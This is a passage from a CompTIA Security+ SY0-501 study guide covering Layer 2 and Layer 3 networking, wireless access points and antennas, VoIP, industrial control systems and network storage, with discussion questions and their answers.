Access Control sublayer of Layer 2, which is responsible for addresses and multiple accesses. They're also
called physical addresses, since in theory every MAC address is unique in the world, corresponding to a
single network adapter or port on a network device such as a router.
MAC addresses are 48-bit numbers, usually written as 12 hexadecimal digits. For readability, they're usually
grouped into pairs, separated by dashes or colons; for example, 10:0D:7F:F3:CE:8F. Sometimes you'll
also see three groups of four separated by periods, such as 100D.7FF3.CE8F. The first six digits are called
the organizationally unique identifier (OUI) and correspond to a device's manufacturer. In this example,
"10:0D:7F" means the device was made by Netgear, Inc. The last six are the device ID, a unique serial

166 CompTIA Security+ Exam SY0-501


Chapter 4: Network fundamentals / Module A: Network components

number assigned by the manufacturer. When necessary, network administrators can also manually override a
hardware MAC address with a custom value, called a locally administered address.
Some newer network types, such as those using IPv6 or Firewire, require a 64-bit physical address called a
EUI-64. A 48-bit MAC address can connect to these networks too. The software just inserts the extra 16 bits
with a placeholder value in the middle of the address.
MAC addresses aren't used for communicating across multiple networks, like on the Internet: that happens on
higher levels of the stack. Instead, they're used strictly by Layer 2 devices on the local network, such as NICs
and switches. Every Ethernet frame has both a source address and a destination address corresponding to a
device on the local network. 802.11 Wi-Fi frames are similar, but add a third MAC address for the wireless
access point.
MAC addresses are important in security as well. They can be part of security controls - access control
systems frequently will contain lists of MAC addresses which are allowed or forbidden to join the network. At
the same time, they don't offer real security, and in fact are a common component of local network attacks.
Not only is it easy for a host or device to override its hardware MAC address, nothing keeps an attacker from
snooping on traffic addressed to a different address, or from falsifying the source address on frames it sends.

Switches
You can string together an Ethernet network with nothing but L1 devices like repeaters and hubs, but you'll
run into performance problems. Since they don't discriminate when it comes to traffic, a network segment
separated only by L1 devices is all part of the same collision domain, an area where no two devices can
transmit simultaneously. If they do, both frames are lost and they have to retransmit. Ethernet can correct for
collisions, but eventually they start crowding out other traffic, hurting performance. This isn't good for
security either: since a frame can be read by any device on the same collision domain, large L1 networks are
highly susceptible to eavesdroppers.

Exam Objective: CompTIA SY0-501 3.2.4.11


To separate collision domains, networks use bridges, more commonly known as switches when they, like
most today, have more than two ports. Unlike a hub, a bridge doesn't immediately pass frames on to other
ports: it waits to see if there is any other host transmitting. If hosts on both sides of the bridge simultaneously
transmit data, the bridge stores both frames, then transmits them in the opposite direction once the segment is
clear.

Some early bridges did nothing more than that, but modern switches also actively control and direct traffic,
forwarding a given frame only to its proper destination segment. To do this, each switch maintains a MAC
table with a list of MAC addresses and the corresponding port on the switch that leads toward that address.
While you can program a MAC table manually, usually the switch learns locations automatically by reaching

CompTIA Security+ Exam SY0-501 167


Chapter 4: Network fundamentals / Module A: Network components

the source address on each incoming frame. Since switches reduce collisions and help prevent traffic from
going to segments where it isn't needed, a switched network can be much larger than a single collision
domain. This also helps security, since if a switch forwards sensitive traffic from port #1 to port #2, an
eavesdropper on port #3 never gets a chance to listen in.
If the destination address isn't in the MAC table, it's flooded to all ports on the switch, in hopes that one of
them leads to the destination host. The same happens if it's addressed to the broadcast address, FF-FF-FF-
FF-FF-FF, indicating that the frame is to be read by all hosts on the network. This also defines the Layer 2
network segment, called the broadcast domain. Normal switches don't segment the broadcast domain, they
only extend it. Eventually, this leads to performance problems: not only can a large enough broadcast domain
be overwhelmed by broadcast traffic, but if multiple paths join any two switches, traffic can form a switching
loop that passes the same frames around and around until they crowd out all other traffic.
Some of these problems can be minimized by using advanced switches with functions that prevent switching
loops and limit other stray traffic, but another part of this is simply picking a network topology that helps
maintain high performance. A large L2 network might arrange switches in a tree formation consisting of three
layers:
 Edge switches which connect to hosts
 Aggregation switches which connect edge switches together, for example to link all switches in a large
wiring closet
 Backbone switches which connect aggregation switches with high performance connections

MAC tables and broadcast domains can affect security too. Spoofed MAC addresses and superfluous
broadcast traffic are commonly used as part of DoS or man-in-the-middle attacks, whether by confusing
switches and hosts or just crowding the network with traffic. Additionally, a host can communicate directly
with any other host on the same broadcast domain, without having to go through a higher level device like a
router or firewall.

VLANs
Traditionally, to split broadcast domains you need to partition the network with routers, and use separate
switches on each segment. This works for some networks, but it's not always ideal. It's usually cheaper buying
a 24-port switch than two 12-port switches, for example. The traditional way also only works well when LAN
membership correlates with physical location: if each LAN is widely spread out you'll need a lot of redundant
cables or even repeaters.
Switches can solve this problem by partitioning the network in software, creating multiple broadcast domains
called virtual LANs, or VLANs. Each VLAN's traffic is kept separate, just like if they were on physically
different L2 networks. Often each VLAN will correspond to an IP subnet, but it's not required so much as
frequently convenient.
VLANs aren't a single standard, but rather a collection of methods switches can use to partition broadcast
domains. Some of them require multilayer awareness and some don't, but they all work fundamentally at L2.
The simplest sort of VLAN is port-based, or static assignment. All the switch has to do is assign each of its
physical ports to a different VLAN. Frames sent to any port are only forwarded or flooded to ports on the
same VLAN. If you want to connect multiple VLANs, you'll need to connect a router to multiple ports, one
on each VLAN.

168 CompTIA Security+ Exam SY0-501


Chapter 4: Network fundamentals / Module A: Network components

Port-based VLAN assignment on a switch.

A more sophisticated method is dynamic assignment. When a device connects to the network, the switch or an
external server assigns it to a VLAN based on device-specific information, such as its MAC address. That
way, it doesn't matter where the device plugs in on the network, it's always on the same VLAN.
Ports can also be assigned by protocol. The switch examines frames to see the protocols used in their
payloads, or even their IP subnets, and forwards to a corresponding set of ports. This may or may not require
a L3 switch: while L3 functions are needed to read IP subnets, even a strict L2 switch can read the payload
protocol type in an Ethernet frame header.
Regardless of how a VLAN's ports are assigned, traffic never actually crosses from one VLAN to another
without being routed. A L3 switch might be able to handle this internally. Otherwise, a router can be
connected to multiple VLANs on the same switch. If that's the only place the router connects, it's sometimes
called a one-armed router, or a router on a stick. Either way, a properly designed VLAN-based network only
routes a minority of traffic, while most remains within its own VLAN.
Since they partition traffic, VLANs can be used to boost security by making sure hosts which shouldn't
directly communicate are kept on different VLANs. This isn't perfect: misconfigured switches and VLAN
hopping attacks can still bypass this line of defense.
Another security risk comes from VLAN trunking, a feature where a link between switches carries traffic from
multiple VLANs. In theory this still keeps VLANs separate since each frame on the trunk is tagged with a
VLAN ID so it won't go to links belonging to other VLANs. In practice it's easy to misconfigure, and even
when configured properly a trunk is an ideal place for an eavesdropper to view or alter traffic from multiple
networks. Even the protocols used to control VLAN trunking can be attacked to reroute or disrupt traffic.

CompTIA Security+ Exam SY0-501 169


Chapter 4: Network fundamentals / Module A: Network components

Discussion: The Data Link layer


1. What are the two main elements to a MAC address?
When written in hexadecimal, the first six digits are an OUI indicating the manufacturer, and the last six
are a unique serial number assigned by that manufacturer.
2. By looking at a MAC address, how can you tell if it's broadcast or not?
If it's FF:FF:FF:FF:FF:FF, it's broadcast.
3. How does a switch prevent collisions and reduce congestion?
When the switch receives a frame on one port, it stores it in memory, and listens on other ports before
transmitting it. If a collision still happens, it can still re-transmit the frame. If it knows which port has the
destination address, it sends the frame only to that port.
4. How can switches segment network traffic?
While they don't separate broadcast domains, switches don't send unicast traffic to parts of the network
they know don't contain the destination. Additionally, VLANs allow a single physical switch to segment
traffic as though it were part of a different L2 network.
5. How are frames kept within their VLAN?
Frames are only switched onto connections marked as part of their VLAN. If it's a trunk link, each frame
is tagged with its VLAN ID.

The Network layer


While the Data Link layer has addressing and segmentation features that allow you to build a fairly large
network, it still has its limits. The simplest is that since a L2 network is a single broadcast domain, when you
expand it eventually you'll reach a point where broadcast traffic becomes overwhelming. Even on a smaller
network, misconfiguration or certain attacks can cause a broadcast storm that drowns out other traffic.
Another issue is that a MAC address might uniquely identify a given network interface, but the address
doesn't say anything about where it is, or how to get there. Bridges and switches can learn where a given
address is, but not until they've heard from it, and even then only in limited ways. Eventually, the network just
outgrows its switches' ability to keep track of its nodes without constant floods and broadcasts that crowd the
whole broadcast domain.
L2 networks are also limited in their physical complexity as well as size, since the Data Link layer has no way
of choosing between two alternate paths to the same destination. While you can arrange many switches into a
tree-like physical topology, if you create multiple redundant routes, such as a mesh topology, the result is a
switching loop that sends the same frames circling endlessly through the network while constantly
overwriting switches' MAC tables. There are switching protocols, such as Spanning Tree protocol, designed
to solve this problem, that work by simply shutting down redundant links unless the primary link fails. This
allows increased reliability in the network, but still limits performance.
Layer 3 devices and protocols are designed to overcome these problems and link far larger, more complex
networks up to and including the internet itself. They segment the larger network into multiple broadcast
domains, and govern traffic between them. They have more advanced routing protocols, letting them find
paths and share network information in ways Layer 2 switches cannot. They also use logical addresses, which
are tied to the network's structure; this means they can more easily pass data in the right direction without
knowing the whole network. All of these create attack vulnerabilities, but at the same time give you more
tools to fight attackers.

Routers
Routers sit at the boundaries between broadcast domains. Using both physical and logical address
information, they gather and store information about their surrounding network topology, use it to determine

170 CompTIA Security+ Exam SY0-501


Chapter 4: Network fundamentals / Module A: Network components

the best route between any two nodes, and then forward network layer packets along it. You've probably seen
and worked with routers, such as the kind almost every home or small office has these days, but much like
wireless access points they're often a combination of several devices in one. It's probably easier to understand
what a router does if you imagine a device that does nothing else.
First, understand that a router needs more computing functions and memory than a typical switch. While most
routers today are specialized integrated devices, you can install routing software on any general-purpose
computer on a network. In fact, before cheap consumer routers were very common small networks frequently
used older PCs instead. So let's make the example a PC connected to a large office LAN and configured to
operate purely as a router. Second, a router needs to join to at least two different Layer 2 networks. This one
has three separate Ethernet cards, each plugged into a different department network. Third, it needs to use a
routable Layer 3 protocol. This one uses IPv4, like most current LANs.

This example shows a simple internal router, joining multiple layer 2 networks as subnets of a larger network.
It's simultaneously a node on each of those three subnets: Each of its NICs has a different MAC address, and
belongs to a different broadcast domain. In fact, since they're separate NICs they aren't even connected to
each other on the Data Link layer: for data to cross from one to the other it needs to pass up further into the
stack from the NIC driver into the operating system's protocol stack, then back down to the other NIC driver.
Now imagine Host #1 wants to share data with others on the network. If it wants to talk with Host #2 it has to
go only through a switch, so it can communicate directly to #2 using a Layer 2 protocol. To communicate
with Host #3, it needs to cross to another subnet. So it creates an IP packet addressed to #3, and encapsulates
it in a frame to send to the router. The router receives the frame, then looks inside to find the IP packet Since
it's a Level 3 device, it can read the packet's destination address and consult against its routing table, the set of
rules and data that the router uses to map its surroundings. Since the destination is on a different subnet, the
router encapsulates the packet into a new Ethernet frame, sending it out on subnet B, and addressing it to #3.
Remember, this is a very simple example. Large networks might have many subnets linked by routers in a
complex web, so on a larger network the router might have to first send the packet to another router. Also,

CompTIA Security+ Exam SY0-501 171


Chapter 4: Network fundamentals / Module A: Network components

Layer 3 networks can have many possible paths between any two nodes, thanks to routers having more
awareness of their surroundings than switches. To do this, they use routing protocols to constantly exchange
information about changes in network conditions.
Like most traditional network devices, routers weren't designed with security in mind, but they turned out to
be the foundation for many modern network security technologies such as firewalls. Their traffic direction
abilities turned out to be easy to modify into other security controls, and since a router needs to be a more
intelligent computer than a switch it's much easier to integrate other security features into most router
hardware. Integrated multifunction devices are most common on smaller networks, but today even dedicated
routers on enterprise networks have an important role in filtering unwanted or suspicious traffic.

IP packets
Internet Protocol version 4 was first deployed in 1983 on ARPANET, an academic and military network that
later became the Internet's primary precursor. It's still used to carry most Internet traffic today, so whenever
you access something on the Internet your computer is probably exchanging IPv4 packets with remote hosts.
Usually no one even qualifies the version: for example an IPv4 address is an "IP address," unless you need to
specify otherwise.
IPv4 is gradually being replaced by IPv6. IPv6 isn't backwards compatible with IPv4, but since it was
designed as a direct successor it's very similar in its overall functions, and both can coexist separately on the
same network segments. The most important feature IPv6 brings for most users is that it allows many more
addresses, but it also includes improvements in performance and security.
On the Network layer IP packets carry the data used by higher level protocols. IPv4 and IPv6 packets have
very similar structure and features.

Header Contains source and destination addresses, version information, payload type, and additional
control information.
Payload Contains information to pass on to other protocols. Payloads can include Transport layer data
like TCP segments and UDP datagrams, or Network layer data using other protocols like ICMP.
In networks using IPv6 tunneling, an IPv6 packet can even be carried as the payload of an IPv4
packet.

An important feature in both versions of IP is a time to live (TTL) value in the packet header. Also known as a
hop limit, the TTL is a number set when the packet is generated and incrementally reduced as the packet
moves between routers. Since packets with a TTL of zero are dropped, misdirected packets can't endlessly
circle the network.
Another feature found only in IPv4 is fragmentation, which allows a router to break one large IP packet into
several smaller ones in order to transmit across L2 subnets that can't accept larger packet sizes, while still
allowing the destination host to reassemble the original payload. Fragmentation is less useful on today's
networks and is used in a number of TCP/IP attacks, so IPv6 does not support it; instead IPv6 adds features
for hosts to negotiate a packet size compatible with the entire network path.
The structure of IP packets is key to many TCP/IP attacks. Most obviously payloads themselves can contain
malicious data or be the object of an attacker who wants to eavesdrop or modify network data. Headers are
another target: not only can addresses be maliciously altered, so can other header fields.

172 CompTIA Security+ Exam SY0-501


Chapter 4: Network fundamentals / Module A: Network components

ICMP
It isn't IP's job, or that of the Network layer in general, to discover errors in data going to higher level
protocols; at the same time, Layer 3 devices need a control protocol for sending diagnostic and error
information relevant to the layer. In TCP/IP networks, this role is fulfilled by the Internet Control Message
Protocol (ICMP).
ICMP is a significant and indispensable component of IP network traffic, but compared to other central
protocols, it's somewhat of an oddity. It's not a protocol that serves a fixed purpose, but rather a framework
that's used for a variety of message types. The messages themselves are carried as IP payloads, but the way
they're handled and the functions they serve are different from most payloads, especially Transport layer
protocols. They're not usually employed by end-user applications, with the exception of network diagnostics.
Instead, they're used mostly by routers and other devices on the Network layer to communicate network
conditions.
The flexible and ubiquitous nature of ICMP also makes it a key part of network attacks. ICMP packets can be
used to flood networks as part of a DoS attack, and deliberately malformed messages can be used to exploit
weaknesses in TCP/IP stack implementations. Even just normal ICMP messages are valuable tool for an
attacker probing a network for vulnerabilities. It's an important part of network defense to block or at least
detect suspicious ICMP traffic, without disrupting the vital messages that allow normal network function.
Unless you're pretty deeply involved in network diagnostics you don't really need to know the inner workings
of ICMP. Some of the most common message types include echo request (or ping) messages used to verify
connectivity, router advertisement or solicitation messages used to help hosts find routers on the local
network, and error messages like "host unreachable" or "time exceeded."

Discussion: The network layer


1. How can a switched LAN benefit from Layer 3 devices like routers?
Large or looped broadcast domains are subject to broadcast-based congestion, switches aren't very good
at communicating network information with each other, and routers can more reliably segment
communication for sake of security.
2. Compare and contrast the structure of an IP packet vs an Ethernet frame.
Both have a payload that can encapsulate higher level protocols, and a header with source and
destination addresses. Since the frame is on the Data Link layer, it has MAC addresses, while the Network
layer packet has IP addresses. Both have different header options: in particular, the packet has a TTL
value that limits how long it can circulate through the network.
3. Why are routers an essential part of network security?
Even routers that aren't designed for security block broadcast traffic and have awareness of the overall
network structure. More importantly, the functions needed to perform basic routing functions also make
them ideal for adding packet filtering and other advanced security roles.
4. Apart from errors, what information might be sent by ICMP?
Examples include more efficient routes, confirmation that a host is up and working, or the presence of a
router on a network.
5. What features of IPv4 packet headers were removed from IPv6, and why?
IPv4 headers include fragmentation information, but IPv6 does not. Fragmentation can cause security or
performance problems, and IPv6 uses larger MTU to avoid the problem.

CompTIA Security+ Exam SY0-501 173


Chapter 4: Network fundamentals / Module A: Network components

Wireless access points


Devices in wireless networks are often very much like those in wired LANs. For example, every node on a
Wi-Fi network, whether a PC, mobile device, or a router, needs to have a wireless NIC. Functionally, it's
exactly like an Ethernet adapter; it just has a wireless transceiver and antenna rather than an RJ-45 interface,
and encodes data in (probably encrypted) 802.11 Wi-Fi frames rather than 802.3 Ethernet frames.
Other devices are a little harder to categorize in Ethernet terms, even if there are still parallels. The most
obvious is the wireless access point that pretty much every wireless network uses to connect to a wired
network. It's easy to imagine that's equivalent to a router, and you can find devices labeled wireless routers in
any electronics store, but it needs a little more explanation than that. If you went into a store and bought a
"wireless access point" it might also be a router, an Ethernet switch, a NAT device, a firewall, and possibly a
coffee maker; in the end it's just another case of multiple device functions being bundled into a single piece of
hardware.

To see things more clearly you could also just buy a device that's only an access point, connecting Wi-Fi
devices into an Ethernet network without any routing or addressing decisions. In classical network terms it's
still a bit of a hybrid device. On the one hand, it's an L2 translating bridge that converts between Wi-Fi and
Ethernet. On the other hand, within the wireless network it functions more like a hub, since a single Wi-Fi
network is a single collision domain. Either way, an access point is just a physical interface for the network
that clients can figuratively plug into.
These features also mean that a WAP, in itself, is less secure than an Ethernet switch. Since it can't separate
collision domains it can't segment the network, and since anyone in range can connect physical security
measures aren't very useful either. This is much of why WAPs typically include encryption and other security
functions that are much less common in Ethernet devices.

WAP types
Comparing typical consumer WAPs with devices that are just access points isn't a theoretical exercise, since
both are in regular use. The former are examples of fat or standalone access points. Not only do they have
other bundled functions like firewalls and routers, they manage wireless security features and have web
interfaces for user management. In a small workplace that only needs one or two WAPs, a standalone model
with strong security features is a good fit. In larger network they can add expense and overhead, since each
must be configured separately.

Exam Objective: CompTIA SY0-501 2.1.8.6, 2.1.8.7, 3.2.1.4, 3.2.1.8


For larger networks, a useful alternative is a series of thin APs that consist of little more than an antenna and
transceiver, with a single connection to the network. All other functions are offloaded to a centralized WAN
controller on a server rack, which performs client management and security functions, while presenting a
single interface for centralized network management. Centrally controlled thin clients even allow easier Wi-Fi

174 CompTIA Security+ Exam SY0-501


Chapter 4: Network fundamentals / Module A: Network components

roaming that lets users move throughout the coverage area without disconnecting and re-authenticating on
each AP along the way.
A third option is a bit between the two: controllerless APs that have a little more processing power than thin
APs but aren't entirely standalone. Instead of a central controller, all APs function as a single cluster that
shares and distributes management functions throughout the network. This is a bit more complex to
implement than a central controller, but more fault tolerant.
Finally, you can have a wireless network without a WAP at all. In an ad hoc network, each device
communicates with other devices in peer-to-peer fashion without any central access point, even allowing
devices to serve as relays for endpoints that aren't directly in range of each other. This can save infrastructure
cost and eliminate a single point of failure, but it's harder to centrally manage and secure, and doesn't offer
access to the internet or other outside networks unless one or more of those peers function as a gateway.
 Standard 802.11 ad hoc networks don't scale very well, so it's more common for one device (usually
with a separate Ethernet or cellular internet connection) to operate as a "mobile hotspot" AP for other
clients to join.
 More sophisticated wireless mesh networks can give more efficient operation and secure management.
They may be client-only, or also support interconnection of access points as part of a larger mesh.
 Several non Wi-Fi standards use ad hoc wireless networks. You might find these in cellular devices,
vehicles, IoT devices, and military equipment.

Every Wi-Fi network identifies itself by a service set identifier (SSID), generally a human-readable network
name. A WAP can be configured to broadcast its SSID as an advertisement to people looking for networks.
Turning SSID broadcast off makes the network less obvious to casual onlookers, but won't hide it from an
actual search.

Wi-Fi signals
Wi-Fi can use a number of different frequency bands. Radio waves of different frequencies have different
properties, leading to some benefits and drawbacks to each.

Exam Objective: CompTIA SY0-501 2.1.8.3, 2.1.8.4

2.4 GHz The most common frequency band for Wi-Fi. It has relatively long range and is widely
available, but it only has a small number of channels, which overlap with each other. This
means it's easy for many 2.4 GHz networks in a small area to saturate all the available channels
and cause heavy interference. Additionally, many non Wi-Fi devices use this band.
5 GHz A higher frequency band. 5GHz transceivers tend to be more expensive and have a shorter
range, but there are more channels, they don't overlap, and fewer other devices use it. This
means it's less prone to interference, and usually allows a higher data rate.
60 GHz An extremely high frequency band. Allows a very high data rate, but it can't generally pass
through walls. That means you can only use it where the client has a clear line of sight. This can
be inconvenient, but it has security benefits.

A given Wi-Fi device might support multiple bands, and even combine them for increased bandwidth or
fallback capacity. For example, a 5 GHz or 60 GHz device usually falls back to the longer range 2.4 GHz
band when signal strength drops, depending on which maintains better speed and reliability.
Whatever band your devices use, distance reduces signal strength, and with it decreases maximum bandwidth.
All devices on a given network have to share the same bandwidth, and frame collisions or other congestion
reduces speeds further. It's a safe bet to assume the effective speed of a given Wi-Fi standard will be much
lower than what's listed on the box.

CompTIA Security+ Exam SY0-501 175


Chapter 4: Network fundamentals / Module A: Network components

Antenna types
Wireless transceivers need some sort of antenna to convert electrical signals to and from radio waves. Most
mobile and Bluetooth devices have small internal antennas you don't really need to worry about, but when
you choose or place a WAP the style and placement of antennas is an essential part not only of network
performance, but security as well. There are many shapes an antenna can take, but they fall into two basic
categories.

Omnidirectional Broadcast and receive signals in all directions. While no antenna is perfectly
omnidirectional, "stick" shaped monopole and dipole antennas are pretty close,
especially when it includes multiple antennas you can angle differently to maximize
coverage area. Common omnidirectional Wi-Fi antennas include the "rubber ducky"
models included with many SOHO WAPs, the "inverted F" antennas built into most
mobile devices, and dome-shaped ceiling antennas.
Directional Broadcast and receive signals very efficiently in one direction but not in others. A
directional antenna has a much longer range than an omnidirectional model of similar
size and power, but only in the direction it is pointed. How directional an antenna is
depends on its shape, and there are multiple models used for Wi-Fi broadcasts.
 Flat patch antennas broadcast on a wide angle, while still being more directional
than a dipole.
 Dish-shaped parabolic antennas broadcast in a very narrow cone, and can reach
longer distances than other models. They're most often used for point-to-point
connections, such as joining networks in two buildings via Wi-Fi.
 Yagi antennas, easily recognizable by multiple parallel rods mounted on a central
spine, are strongly directional, but usually less so than parabolic dishes.
 Homemade cantennas consisting of simple metal probes placed inside metal cans
or foil-lined tubes can be used as directional antennas, but usually won't be as
effective as a commercial model.

When it comes to Wi-Fi, coverage and security have a complicated relationship. For performance, it's ideal to
have a strong signal everywhere users are likely to be. For security, it's best to make sure that people outside
of secured areas have minimal opportunity to connect to or eavesdrop on Wi-Fi networks. Antenna choice is
much of how you can shape coverage areas.
 Even you can't easily move the WAP to where you want the antenna to be, many have standard RP-
SMA connectors that support extension cables as well as various antenna types.
 Directional antennas are a good way to limit coverage along a corridor. Wide-angle patch antennas
mounted on ceilings can cover a room while restricting coverage outside.
 To further restrict coverage, many WAPs allow you to reduce broadcast signal strength. This can hurt
performance in larger coverage areas, but isn't as much an issue in small spaces.
 Directional antennas can also be connected to wireless clients with external antenna connections. This
is useful for reaching a wireless hotspot at a distance - including for attackers who can't easily get
inside the normal coverage area.

176 CompTIA Security+ Exam SY0-501


Chapter 4: Network fundamentals / Module A: Network components

Discussion: Wireless access points


1. Barring configuration features, how is a WAP less secure than a switch?
Since it can't separate collision domains it can't segment the network, and since anyone in range can
receive its broadcasts physical security measures aren't very useful either.
2. Would thin or fat APs be a better fit in your organization?
For smaller organizations and coverage areas standalone APs are cheaper and easier to manage, but
thin APs have lower management overhead in large wireless networks.
3. How can choice of antenna affect security?

Unconventional and converged networks


When you think of "the network" it's natural to imagine a typical IP network linking clients and servers to
each other and the internet, but that's hardly the only kind. Other networks are used for telephone
communications, industrial control systems, security alarms and cameras, HVAC controls, and dedicated data
storage networks that connect to servers. Traditionally, these networks were separate from computing LANs:
they used different protocols, different switching methods, and connected devices that had no reason or ability
to communicate with general purpose computers. Some weren't even entirely digital systems, for that matter.
Even more than other older networks, security usually wasn't a concern: not only were the individual devices
not considered particularly vulnerable to attack, but there usually was fairly little attack surface for the
network in the first place.
Today, network convergence means that not only are these other networks increasingly being connected to
high performance TCP/IP networks, but IP networks are even directly carrying the traffic and performing the
duties that used to be handled by those other networks. While this approach is cost-effective and opens
possibilities no one imagined in the past, it changes the security situation dramatically. Not only are these IP-
enabled devices vulnerable to attacks targeting IP networks in general, but many of them today are using the
same computing technology other hosts are. A digital telephone server or industrial control device that's
operating on the same sort of hardware and operating system you might use for an ordinary network host will
be vulnerable to the same attacks.
Even when these other networks operate separately from IP networks, either physically separate or just using
other, non-IP protocols across the same physical connections, that doesn't mean they're secure today either.
Increasingly sophisticated devices, especially those sharing PC technologies and operating systems, have
increasing vulnerabilities to modern attackers. Even dedicated devices aren't immune: attacks have been
found which target specialized embedded systems, using PCs as nothing more than a transmission vector.
Security researchers have even demonstrated the ability to take control of common automobile models right
on the highway. While most of these attacks have been limited or required specialized resources, the lesson is
clear: no digital system that allows external data connections can be considered truly immune to network
attacks.

CompTIA Security+ Exam SY0-501 177


Chapter 4: Network fundamentals / Module A: Network components

Voice over IP
Voice over IP is exactly what it sounds like: voice transmissions are digitized, broken up into packets, and
sent over an IP network. This generally implies two or more directions, like a telephone conversation or
conference call, as opposed to one-way like streaming audio, but both are examples of real time services that
carry data intended to imitate the constant stream of a dedicated media transmission, and both have similar
challenges. Thanks to improved technologies and generally faster networks, especially in the last ten years
VoIP has advanced rapidly to replace circuit-switched calling at every level while still interoperating with
PTSN users and numbers:

Exam Objective: CompTIA SY0-501 2.1.16

 Voice chat applications used by computers or mobile devices


 Phone service included with cable or fiber-optic Internet connections
 Private branch exchanges (PBX) used in internal private telephone networks
 Voice over LTE (VoLTE) used on 4G cellular networks
 IP backhaul, the connection of telephone switching centers over public IP networks

Beyond just telephone calls, VoIP systems often support other phone-related services such as voice mail, SMS
text messages, and fax functions. Since the IP network allows transmission and integration of data in ways
traditional phone services do not, they can add additional features. The most visibly out of classic science
fiction is how VoIP technologies are easily extended into video teleconferencing, but they can also add
presence services that report on an intended recipient's real-time availability and allow unified collaboration
over multiple communication systems .
The topology of a VoIP network is just like any other IP network. The only difference is the specific clients,
servers, and protocols in use. Likewise, the gateway can lead either to a packet- or circuit-switched public
network, or even to both. The other end of the conversation is presumably some sort of telephone (analog or
digital) rather than a conventional host or LAN, but intermediate systems don't really need to know one way
or the other.

IP phone Outwardly looks and acts like a normal analog telephone, whether handset or
headset; it may also have additional features. It connects to an Ethernet switch
rather than an analog telephone network.
Call agent Replaces most logical functions of a telephone exchange by managing
connections and routing calls. The call agent responds to dialing requests from
local phones, and routes remote calls to the correct phone.
Media gateway Connects the PBX LAN to the outer IP or PTSN WAN, and controls calls into or
out of the PBX. The gateway can also manage WAN bandwidth, refusing calls
when the link becomes saturated.

178 CompTIA Security+ Exam SY0-501


Chapter 4: Network fundamentals / Module A: Network components

Application server Provides additional PBX services such as voice mail, or advanced UC services.
Multipoint control unit Manages teleconferences between more than two users. The multiple audio or
(MCU) video streams of a large teleconference can be bandwidth and processor intensive,
so the MCU might have specialized hardware to combine them.

Any of these devices could be a specialized hardware appliance. Many can also be software applications
running on general purpose computing hardware. Either way, since they're on the IP network, they need to be
treated as hosts, devices, or applications and secured like any other.

Industrial control systems


Industrial control systems (ICS) are devices used to monitor and control industrial systems. They're
commonly used in factories, industrial process plants, and distribution infrastructures like power grids or gas
and water pipelines. The obvious value of central control and monitoring meant that ICS started becoming a
networking technology decades ago, but for a long time they mostly used specialized technologies. More
recently, ICS networks have increasingly adopted TCP/IP over Ethernet technologies, and have even become
a driving force of the Internet of Things, the growing phenomenon of tools and devices not normally
associated with computer networking, but outfitted with electronics and joined to existing networks.
For a long time, the two most common ICS paradigms were Supervisory Control And Data Acquisition
(SCADA) and Distributed Control System (DCS). Originally the two were designed in very different ways to
serve very different needs, and technical limitations kept either from being very good at the other's job. Later,
as networks got faster and computers got more powerful, the boundaries between the two became increasingly
blurred.
 SCADA was developed for large scale distribution systems, and is focused on information gathering
and limited control. The central station may not be in frequent and reliable contact with individual
devices, so it doesn't focus on fine control of discrete processes so much as watching for state changes
in remote systems and sending control messages in response.
 DCS was designed to extend existing process control systems in refineries and other industrial plants,
while still remaining within the confines of a single operation. Since the networks involved were higher
speed over shorter distances, it's based on the idea of real time monitoring and control of process states,
with equipment directly controlled through a hierarchy of networked systems. On the other hand, since
it's designed for managing discrete processes it's less capable of monitoring state changes and is unable
to tolerate unreliable service.

Not only are ICS networks increasingly being built on TCP/IP over Ethernet, but they're also increasingly
being connected to existing data networks or standard computer systems, rather than being entirely isolated
and specialized as they were in the past. They're also being more widely used: these standards and newer ones
aren't just used for large industrial plants, but also to control such simple things as appliances and HVAC
systems.
The benefits aren't hard to see, but the primary drawback is security: ICS design traditionally is very open,
robust, and forgiving, with no thought given to security. Worse, it's frequently used for critical infrastructure
and industry applications where sabotage or malfunction could be not only costly but even deadly. Discovery
of the Stuxnet worm designed to attack ICS hardware has drawn the attention of security experts to ICS
vulnerabilities. Importantly, Stuxnet relied on traditional IP networks and removable USB media to spread,
which demonstrates the dangers of converging networks and using insecure media.

CompTIA Security+ Exam SY0-501 179


Chapter 4: Network fundamentals / Module A: Network components

Network storage
Remote storage is one of the most basic uses of a network, but it's still been greatly affected by the
convergence of network technologies thanks to the development of the storage area network (SAN). To
understand why it's significant, first you need to know a couple of related and easily confused terms.
Early on, storage systems were all what's now called directly attached storage (DAS), which as the name
suggests is directly attached to a host. Modern examples of DAS are internal and external SATA and USB
drives. The host's operating system manages the file system, while the DAS doesn't really need an operating
system, just some controlling electronics for the host to access.
DAS by its nature can be controlled by only one host at a time, but the operating system can always share
folders, or entire drives, on the network for wider access. It started on general purpose servers, but specialized
file servers gave better performance since they don't have other tasks consuming resources. Eventually faster
and cheaper computers led to network attached storage (NAS): a specialized hardware appliance with nothing
but hard drives, a network interface, and a stripped down operating system optimized for sharing files. On the
network they're really all the same thing, letting any host with suitable permissions access the shared storage
space.
One important limitation of NAS is that it's still a drive directly controlled by another computer, even if that
computer is a dedicated appliance. While you can access it over the network, you don't have the full control
over it that you would DAS on your own system. Additionally, if you're just one of many clients trying to
access it, the NAS can run into assorted performance and flexibility problems. One solution is a storage area
network (SAN), an array of storage devices on the network. A SAN is much like a NAS except that its
controlling hardware allocates it more directly to network hosts and protects file systems from simultaneous
access by multiple hosts. That way, hosts can create and access drives over the network, while retaining all the
flexibility and control of DAS.
Both NAS and SAN have obvious security implications, since both are means of sharing data directly over a
network connection. NAS isn't too complicated at least: since it's fundamentally a file server running on
dedicated hardware you secure it the same way, by making sure the NAS itself and the file-sharing protocols
are protected against attackers and eavesdroppers. SAN is a more complicated solution used primarily but not
exclusively in large server rooms and data centers. It uses specialized protocols which may or may not be on
IP networks and may or may not be shared with other traffic.

Discussion: Network convergence


1. Does your workplace use VoIP, industrial control systems, or SANs?
Answers may vary.
2. Why is security a fairly new concern in ICS networks?
They were never designed with security in mind, but they tended to use their own proprietary systems and
weren't frequently the target of network attacks. ICS-targeting malware and all-IP networks have
drastically changed the situation.
3. Why would someone attack a VoIP network?
Attackers might want to eavesdrop on calls, place fraudulent calls, or compromise servers and devices
for other network attacks.
4. How should you secure VoIP networks?
Since they're comprised of IP devices and servers, you should secure them like any other hosts and
appliances, and consider putting them on segmented networks.

180 CompTIA Security+ Exam SY0-501


Chapter 4: Network fundamentals / Module A: Network components

Assessment: Network components


1. Order the OSI layers from bottom to top.

1. Application
2. Data Link
3. Network
4. Physical
5. Presentation
6. Session
7. Transport
